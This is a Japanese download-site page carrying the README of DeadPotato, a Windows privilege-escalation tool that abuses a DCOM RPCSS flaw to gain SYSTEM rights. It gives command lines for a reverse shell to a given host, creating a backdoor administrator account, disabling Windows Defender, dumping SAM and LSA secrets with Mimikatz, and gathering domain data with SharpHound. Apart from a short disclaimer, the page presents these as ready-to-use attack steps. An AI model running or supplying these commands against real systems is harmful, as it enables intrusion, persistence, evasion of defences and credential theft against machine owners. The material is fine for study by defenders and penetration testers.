ホーム>プログラミング関連>その他のソースコード
ダウンロード
デッドポテト
デッドポテト

QQ浏览器截图20241111131452.png


Hashdump および SharpHound モジュールが利用可能になりました!

❗ 許可されていないコンテキストでのこのプログラムの使用は固く禁じられています。 DeadPotato の作者は、システムに生じた損害に対して一切の責任を負いません。慎重に使用してください。 ❗ 

C:Userslypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   |  _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITYSYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

クイックスタート - 使用方法

SeImpersonatePrivilege権限がコンテキストで有効になっていますか? DeadPotatoを使用すると、ローカル システム上で最大の権限を達成することができます。

このツールは、OXID の処理における DCOM の RPCSS の欠陥を悪用することにより、 NT AUTHORITYSYSTEMユーザーのコンテキストで実行される昇格されたプロセスを開始しようとし、重要な操作を自由に実行するためのマシンへの無制限のアクセスを可能にします。

次の場合、 -cmdモジュールが使用されます。昇格されたリバース シェルを生成する-rev IP:PORT永続化のために新しいローカル管理者ユーザーを作成する-newadmin usr:pass 、SAM ハッシュをダンプする-mimi samなど、多くのモジュールを使用できます。

353823526-b5f71f4a-f8bc-4099-81c5-54bcece7abb6.gif

SeImpersonatePrivilege 権限を確認する

DeadPotato を使用するには、現在のコンテキストで SeImpersonatePrivilege 権限を有効にする必要があります。これを確認するには、 whoami /privコマンドを実行します。権限が無効になっている場合、現在のコンテキストでは悪用することはできません。 

C:Userslypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

高度なリバース シェルを取得する

1731302107963065.gif

クレジット

このプロジェクト「DeadPotato」は、BeichenDream の名作「GodPotato」のソースコードをベースに構築されたツールです。このプロジェクトが気に入ったら、ぜひ元のプロジェクトもサポートしてください

BeichenDream、Benjamin DELPY gentilkiwi 、BloodHound 開発者。

ライセンス

このプロジェクトは、Apache 2.0 ライセンスに基づいてライセンスされています。詳細については、LICENSE ファイルを確認してください。

拡大する
追加情報
関連アプリ
おすすめ
関連情報 すべて
ユーザーコメント